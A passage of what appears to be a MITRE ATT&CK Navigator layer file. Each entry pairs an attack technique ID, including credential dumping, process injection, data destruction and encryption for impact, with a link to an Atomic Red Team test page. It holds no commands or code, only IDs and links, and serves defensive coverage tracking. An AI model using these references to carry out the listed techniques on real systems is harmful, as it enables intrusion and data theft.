test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T100
3/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/
atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.0
01/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/mast
er/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1
518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1